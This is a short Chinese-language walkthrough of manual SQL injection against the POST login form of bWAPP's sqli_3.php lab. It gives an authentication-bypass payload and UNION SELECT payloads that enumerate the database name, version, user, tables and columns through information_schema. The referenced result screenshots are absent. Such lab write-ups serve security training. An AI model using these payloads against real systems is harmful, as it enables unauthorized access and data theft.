標籤:bWAPP之sqli_3.php SQL注入之POST方式
1、首先在login框中輸入一個單引號看看有什麼結果,結果
仔細一看,報錯內容中的“AND”前有四個單引號,說明我們輸入的一個單引號正好和代碼前的單引號閉合了。
2、嘗試構造萬能密碼,嘗試輸入
“login=1‘ or 1=1 --+
&password=
&form=submit”,好像不對,在嘗試輸入
“login=1‘ or 1=1 #+
&password=
&form=submit”,對了,結果
3、判斷欄位數並查看顯示位:
輸入“login=1‘ order by 5 #+”,報“Error: Unknown column ‘5‘ in ‘order clause‘”,輸入“login=1‘ order by 4 #+”,報“Invalid credentials!”,說明欄位是4,結果
輸入“login=-1‘ union select 1,2,3,4 #+”,結果
4、查看資料庫等資訊:
輸入“login=-1‘ union select 1,database(),3,group_concat(version(),"||",user()) #+”,得知資料庫名為Bwapp,結果
5、查詢表名:
輸入“login=-1‘ union select 1,database(),3,table_name from information_schema.tables where table_schema=‘Bwapp‘ #+”,得知表名為Blog,結果
6、查詢欄位名:
輸入“login=-1‘ union select 1,database(),3,column_name from information_schema.columns where table_name=‘Blog‘ #+”,得知欄位名為Id,結果
7、查詢欄位內容:
輸入“login=-1‘ union select 1,database(),3,id from Blog #+”,沒有資料。
SQL注入之bWAPP之sqli_3.php